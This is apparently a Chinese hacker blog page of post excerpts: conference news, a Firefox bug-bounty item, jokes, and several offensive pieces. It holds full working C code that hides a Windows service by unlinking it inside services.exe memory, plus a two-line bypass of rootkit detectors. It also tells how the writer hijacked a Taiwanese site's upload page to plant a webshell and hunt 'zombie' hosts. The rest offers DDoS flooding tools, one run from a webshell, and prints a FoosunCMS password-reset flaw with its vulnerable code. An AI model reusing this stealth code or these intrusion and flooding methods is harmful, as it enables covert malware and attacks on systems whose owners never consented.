Chinadu`s Blog

要预测本周举行的两大顶级黑客大会Black Hat和Defcon会出现什么重大新闻可不容易，因为最刺激的一幕往往发生在最后一刻，Black Hat和Defcon每年都会在赌城拉斯维加斯举办一次，前后不过相差一两天时间，因此人们称之为姊妹会议，今年的Black Hat会议定于周三和周四，Defcon大会定于周五和周六举行。纵观今年拟定的演讲主题，今年的两会将主要有以下五大看点。

1、终结者2现实版，让ATM自动吐钞

今年最值得期待的演讲会是来自曾在瞻博网络工作过的Barnaby Jack，Jack过去数年一直从事ATM(自动取款机)安全研究，本次大会他将会精彩呈现他发现的部分漏洞，ATM目前是漏洞研究的绿地。

Black Hat大会主席Jeff Moss说ATM漏洞研究使人想起几年前的投票机漏洞研究，当时发现了投票系统的严重漏洞，迫使许多政府机构重新考虑他们的电子投票方式。

Jack的演讲备受争议，大会收到了多家ATM厂商的严正警告，在去年的Black Hat大会，直到最后一分钟瞻博才决定让Jack上，今年情况不同了，Jack已经离开瞻博到了IOActive，他打算在今年的大会上展示几种新型 ATM攻击方法，包括远程攻击，根据大会主办方的活动说明，Jack还会透露所谓的“跨平台ATM Rootkit”。

Jack在他的摘要中写道：“我喜欢终结者2中的场景，John Connor走到ATM前，将他的Atari连接到读卡器，然后ATM就自动吐出现金，我已经让它变成了现实”。

(译者乱评：这和前不久前在国内出现的山寨ATM机完全不是一回事，Jack可以让任何一家银行的真实ATM自动吐钱，技术含量谁高谁低?)

阅读全文...

图文：udb311
主题：MSSQL内网渗透案例分析
发表：黑白前线

描述：对于内网渗透技术一直感觉很神秘，手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术！本文敏感信息以屏蔽！密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行，再通过自己的灵活思维运用。

环境：2003 SERVER
IIS ：6.0 支持php
数据库：MSSQL和MYSQL
网站类型：ASPX

本文重点讲述内网渗透提权部分，对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道，拿到webshell后服务器能否提权就要先找提权的漏洞所在。从本站的角度来看，存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录，很平常么。没现有SU和MYSQL之类的信息。

阅读全文...

本文阐述：文章从网站入侵到内网渗透提权，作者给大家带来了一篇精彩的内网渗透文章。读后此文你能清晰的认识到内网入侵的细节技术。

由于平时比较忙，用了很久的VPN肉鸡飞掉了，近来正好有时间于是打开google搜索upfile.asp开始找肉鸡，来了台湾某XX站，http://xxx.xxx.tw/xx/upfile.asp，为了不必要的麻烦，我隐藏了敏感内容。直接到传asp提示错误，那么直接传了gif以后，查看上传路径发现自己重命名了，如果没有重命名的话在IIS6下百分之90以上可以拿shell了，除去目录末有执行脚本权限。最后抓包分析改上传路径，最后得到一个shell，图1。具体方法翻翻以前杂志或google找吧，一找一大堆。

执行命令后，发现权限还比较大，能够执行一些简单命令，像net user、ipconfig /all等等。。

阅读全文...

Mozilla公司宣布用户报告火狐漏洞，最高将获得3000美元奖励。

最初Mozilla设置的奖励金额为500美元，这也是谷歌为其Chrome浏览器设置的奖励金额，也是谷歌奖励过的最高1，337美元的两倍。Mozilla和谷歌是业界唯一会向报告漏洞的用户提供奖励的浏览器生产商。

“六年来，Mozilla的奖励计划做了不少的调整。我们相信，最好的保证用户浏览安全的方法就是引入奖励机制，”Mozilla的安全设计部门总监 Lucas Adamski说。从2004年8月开始，Mozilla就推出了报告漏洞奖励计划。

只有那些被Mozilla列为“严重” 和“高危”的漏洞可以得到奖励。在Mozilla的分级制度里，严重的漏洞是那些会导致遥控代码执行的，换句话说，会导致黑客完全控制电脑的漏洞。高危漏 洞是那些会暴露用户关键信息，如用户名，密码和信用卡号码的漏洞。“拒绝服务“漏洞不符合奖励计划。
阅读全文...

1.昨晚座公交，快到终点了特别空，一年轻女子投入地讲电话，先是很小声，边讲还边抽泣，突然 　　嗓门放大来了句颤音：“你到底要做我丈夫还是姐夫！” 稀稀拉拉几个人瞬时安静侧目，陷入无限联想中……
2.某天自己下楼逛超市回来，刚一开门，娇声娇气的朝屋里问了句：先生，要服务吗？结果老公没应声，狗狗喜颠颠跑过来奶声奶气的：“汪、汪！” 老公笑倒~
3.大一由于校区没建好，学生太多，大一在陆军学院上学，那里有军队，一次学校组织看电影，得2块钱买票，我和我哥们阿磊没买票不想去，吃完饭我们又想去，我俩就结伴寻思能偷着进去看个免费的，我们俩来到大礼堂，手刚伸到门把手，身后一片亮光，我以为是探照灯，我对磊说，我草，果然是军校，然后我俩把手举起来了，结果一辆汽车转弯而去……
4.话说高中的时候，手机还是非常昂贵的。某同学攒钱N久终于买了一部M牌的带电线，那叫做一个爱不释手啊。因为怕磨损，去手机店贴膜。当天也是巧了，正好手机膜卖光了。这同学灵机一动，去药店买了一个安全套，直接套在手机上了，颗粒正好在键盘上，按起来手感还不错。最搞笑的：前边的储jing囊。正好放天线，后来每次打电话，引来目光无数……
阅读全文...

来自：ASM

过RKU,GMAER的dll模块检查的代码，就两句：

ldm->HashLinks.Blink->Flink = ldm->HashLinks.Flink;
ldm->HashLinks.Flink->Blink = ldm->HashLinks.Blink;

//下面是一个ring3下隐藏服务的代码，也是抄别人小小修改了一下而已的：

#include <stdio.h>

#include <stdlib.h>

#include <windows.h>

#include <Tlhelp32.h>

// 几个Undocument的结构

typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

typedef struct _SC_SERVICE_PROCESS

{

PSC_SERVICE_PROCESS Previous;

PSC_SERVICE_PROCESS Next;

WCHAR *ImagePath;

DWORD Pid;

DWORD NumberOfServices;

// ...

} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE

{

PSC_DEPEND_SERVICE Next;

DWORD Unknow;

PSC_SERVICE_RECORD Service;

// ...

} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD

{

PSC_SERVICE_RECORD Previous;

PSC_SERVICE_RECORD Next;

WCHAR *ServiceName;

WCHAR *DisplayName;

DWORD Index;

DWORD Unknow0;

DWORD sErv;

DWORD ControlCount;

DWORD Unknow1;

PSC_SERVICE_PROCESS Process;

SERVICE_STATUS Status;

DWORD StartType;

DWORD ErrorControl;

DWORD TagId;

PSC_DEPEND_SERVICE DependOn;

PSC_DEPEND_SERVICE Depended;

// ...

} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

int WINAPI UnicodeToAnsiStr(OUT char *lpChar, IN WCHAR *lpWideChar)

{

int iLen;

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, NULL, 0, NULL, NULL);

if ((iLen > 1) || (iLen < 20))

{

ZeroMemory(lpChar, 40);

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, lpChar, iLen, NULL, NULL);

}

return iLen;

}

BOOL SetDebugPrivilege()

{

BOOL bRet = FALSE;

HANDLE hToken = NULL;

LUID luid;

TOKEN_PRIVILEGES tp;

if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))

{

tp.PrivilegeCount = 1;

tp.Privileges[0].Luid = luid;

tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);

}

if (hToken) CloseHandle(hToken);

return bRet;

}

DWORD GetProcessIdByName(char *Name)

{

BOOL bRet = FALSE;

HANDLE hProcessSnap = NULL;

PROCESSENTRY32 pe32 = { 0 };

DWORD Pid = -1;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hProcessSnap, &pe32))

{

do

{

if (!lstrcmpi(pe32.szExeFile, Name ) )

{

Pid = pe32.th32ProcessID;

break;

}

}

while (Process32Next(hProcessSnap, &pe32));

}

CloseHandle(hProcessSnap);

return Pid;

}

// 修改内存属性为指定值

void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)

{

MEMORY_BASIC_INFORMATION mbi;

DWORD dwOldProtect, dwWritten;

VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);

WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);

}

//寻找服务链表

PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)

{

char FileName[MAX_PATH+1];

HANDLE hFile, hFileMap;

UCHAR * pMap;

DWORD dwSize, dwSizeHigh, i, dwRead;

SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;

GetSystemDirectory( FileName, MAX_PATH );

strcat( FileName,"\\Services.exe");

hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,

NULL, OPEN_EXISTING, 0, NULL);

if (INVALID_HANDLE_VALUE == hFile) return NULL;

dwSizeHigh = 0;

dwSize = GetFileSize(hFile, &dwSizeHigh);

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);

if (NULL == hFileMap) return NULL;

pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);

if (NULL == pMap) return NULL;

dwSize -= 12;

for (i=0; i<dwSize; ++i)

{

// 搜索services!ScGetServiceDatabase特征代码

if (*(DWORD*)(pMap+i) == 0xa1909090 &&

*(DWORD*)(pMap+i+8) == 0x909090c3)

{

if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&

ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

SvcRd.sErv == 'vrEs') // ServiceRecord结构的特征

{

pRet = pSvcRd;

break;

}

}

}

UnmapViewOfFile(pMap);

CloseHandle(hFileMap);

CloseHandle(hFile);

//printf( "addr: 0x%08x\n", (DWORD *)pRet );

return pRet;

}

// 隐藏服务

BOOL HideService(char *Name)

{

DWORD Pid;

HANDLE hProcess;

SC_SERVICE_RECORD SvcRd, *pSvcRd;

DWORD dwRead, dwNameSize;

WCHAR SvcName[MAX_PATH] = { 0 };

char lpSvcName[256] = {0};

dwNameSize = strlen(Name)*2; //UNICODE的话，长度要乘以2

if (dwNameSize > sizeof(SvcName))

{

return FALSE;

}

Pid = GetProcessIdByName("Services.exe");

if (Pid == -1)

{

printf("get pid error\r\n");

return FALSE;

}

if(!SetDebugPrivilege())

{

printf("SetDebugPrivilege error\r\n");

return FALSE;

}

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);

if (NULL == hProcess)

{

printf("OpenProcess error:%d\r\n",GetLastError());

return FALSE;

}

pSvcRd = FindFirstServiceRecord(hProcess);

if (NULL == pSvcRd)

{

printf("FindFirstServiceRecord error\r\n");

CloseHandle(hProcess);

return FALSE;

}

do

{

if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))

{

//OutputDebugStringW(SvcName);

// 匹配服务名

memset(lpSvcName,0,sizeof(lpSvcName));

UnicodeToAnsiStr(lpSvcName,SvcName);

if (lstrcmpi(lpSvcName, Name) == NULL)

{

// 从链表中断开（一般来说ServiceRecord是可写的，但还是先改保护属性以防万一）

ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);

ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);

CloseHandle(hProcess);

return TRUE;

}

}

else

{

break;

}

}

while (pSvcRd = SvcRd.Next);

if( NULL != hProcess )

{

CloseHandle(hProcess);

}

return FALSE;

}

int main()

{

HideService("Alerter");

return 0;

}

“我们没有高深的知识,我只不过是一个可怜的四年制中专生。我们没有高深的技术,我们只不过在学习着国外N年前的东西,其实无论网络还是生活,我们都是孤独”。
10年过去,刘庆的网络安全公司打着“红盟”的旗帜,俨然充当起“红客” 的“法定继承人”。而在他背后,中国黑客则挣扎在身份失焦、利益博弈和前路未卜的生存境遇中。

刘庆(右一)抢注的“红盟”商标及其公司的“红客”成员(左一为向明)。 摄影_姚松鑫

窗外正对着陆家嘴楼群,刘庆把影印的《外交政策》(Foreign Policy)杂志,往老板台上一拍,摊手诉苦:“这老美还把我写成一个'大黑客',甚至和年初攻击Google的'极光行动'联系到一起。”

今年三月号美国《外交政策》刊载了《中国黑客军团》(China's Hacker Army)一文,推测Google、 Adobe等上百家公司去年冬天受到来自中国的网络攻击,策源于“松散的牛仔式黑客组织”。一个网名为“Sharpwinner”的中国男人,在文中被指认为重要头目,并配发了一张肖像照。
阅读全文...

发布时间:2010-07-02
影响版本:
FooSun > 5.0
漏洞描述:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

在文件\User\ GetPassword.asp中：

ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword ='"& NoSqlHack(p_pass_new) &"' where UserName = '"& NoSqlHack(StrUserName) &"' and Email = '"& NoSqlHack(Replace(Request.Form("Email"),"''",""))&"'") //第220行
用户可以本地构造表单使程序直接进入修改密码，只需要知道用户名和邮箱。

<*参考 Bug.Center.Team *>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
阅读全文...

点击↑小图放大

效果没有下面那个PHP的明显。
既然群里面的朋友要，也放出来吧。
使用方法：填写IP地址 端口 线程 AddtoAttack
有朋友说看不懂，我囧，英文在稀烂，猜也猜的到这几个功能。

下载地址：
阅读全文...

效果还是不错的，一般的网站直接打翻。
群里面，昨日重现和肖申克的救赎一直吵着要这种webshell下的压力测试工具。
有人拿这东西卖钱，装13，我Google了一下，国外的东西，下载下来共享之。
用法：通过各种方式上传到PHP网站目录下，填写IP地址，压力测试之。

下载地址：
阅读全文...